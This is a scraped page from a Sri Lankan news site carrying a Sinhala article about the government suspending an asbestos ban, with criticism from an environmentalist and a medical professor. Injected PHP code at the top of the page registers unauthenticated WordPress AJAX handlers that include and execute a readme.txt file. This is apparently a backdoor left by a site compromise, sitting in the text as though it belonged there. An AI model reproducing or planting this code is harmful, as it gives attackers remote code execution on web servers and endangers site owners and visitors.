if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } "මිනිසාගේ සෞඛ්‍යට සිදුවෙන හානිය හිලවු කරන්න බැරිවෙයි" - mediahumanrights.lk
mediahumanrights.lk
Local News News

"මිනිසාගේ සෞඛ්‍යට සිදුවෙන හානිය හිලවු කරන්න බැරිවෙයි"

ලබන වසරේ සිට ක‍්‍රියාත්මක කිරීමට නියමිතව තිබූ ඇස්බැස්ටෝස් තහනම අත්හිටුවීමට රජය ගත් තීරණය පිළිබඳ කණගාටු වන බව සොබාදහම් අධ්‍යයන මධ්‍යස්ථානය පවසනවා.
එහි ජාතික සම්බන්ධිකාරක පරිසරවේදී රවීන්ද්‍ර කාරියවසම් පැවසුවේ වෙනත් කාරණා පදනම් කරගනිමින් එම තහනම ඉවත් කිරීම සුදුසු නොවන ක‍්‍රියාවක් බවයි.
ශ‍්‍රී ලංකාවේ තේ ආනයනය අත්හිටුවීමට රුසියාව ගත් තීරණය සහ ශ‍්‍රී ලංකාව ක‍්‍රියාත්මක කිරීමට නියමිතව තිබූ ඇස්බැස්ටෝස් තහනම අතර සම්බන්ධයක් ඇති බවට නිල නොවන වාර්තා පළ වන බවයි අමාත්‍ය නවීන් දිසානායක ද ඊයේ (20) ප‍්‍රකාශ කළේ.
කෙසේවෙතත් ඇස්බැස්ටෝස්වලින් ඇතිවන බලපෑම සම්බන්ධයෙන් පරිසරවේදී රවීන්ද්‍ර කාරියවසම් අදහස් දක්වමින් සඳහන් කළේ ඇස්බැස්ටෝස් කැඩී යෑමේදී සිදුවෙන හානි සහ අහිතකර තත්ත්වයන් ගණනාවක් මිනිස් සෞඛ්‍යට බලපෑම් ඇති කරන බවයි. මෙම හානිය සඳහා එහි සුදු හෝ වෙනත් වර්ණයක් අදාළ නොවන බවද පැවසුවා.
රජරට විශ්වවිද්‍යාලයේ වෛද්‍ය පීඨයේ මහාචාර්ය වෛද්‍ය චන්න ජයසුමන පැවසුවේ මෙවැනි තත්ත්වයන් පිළිබඳ සොයා බැලීමට විශේෂඥ කමිටුවක් රුසියාවට යොමු කිරීමද අවශ්‍ය නොවන ක‍්‍රියාවක් බවයි.
එහිදී ඔහු සඳහන් කළේ “මේ ආකාරයේ තීරණවලින් මිනිසාට සිදුවෙන හානිය පිළිබඳ හිලවුවීමක් සිදු කිරීමට නොහැකි වෙයි. මේවා දේශපාලන කාරණා. ලෝකයේ ඇස්බැස්ටෝස් පිළිබඳව අනන්තවත් සිදුකළ පර්යේෂණ වාර්තා අද ඕනෑම කෙනෙකුට අන්තර්ජාලය හරහා ලබා ගන්න පුළුවන්..ඒ ගැන නැවත අපේ රටේ නියෝජිතයින් පිරිසකට රුසියාවට ගිහින් කරන්න පුළුවන් පර්යේෂණයක් තියනවයි කියලා හිතන්න අමාරුයි. ඒකෙන් වෙන්නේ ඒ ගුවන් ටිකට් පත් සඳහා මේ රටේ ජනතාවගේ මුදල් වියදම්වීමක් පමණයි.” යනුවෙනි.
(under the courtesy of nethnews.lk news web)

Related posts

බියර් මිල අඩු කිරීම නිසා බීමතින් රිය ධාවනය ඉහලට..

Shiran Viraj

සියළු විශ්ව විද්‍යාල අද සිට අදියර කිහිපයක් යටතේ විවෘත කෙරේ

Shiran Viraj

ආණ්ඩුකාර බිරිදක් රජයේ ඉඩමක් ඉල්ලා ප‍්‍රා.ලේ.ට තර්ජන.. ඡන්දෙන් පස්සෙ බලාගන්නම්ලු..

Shiran Viraj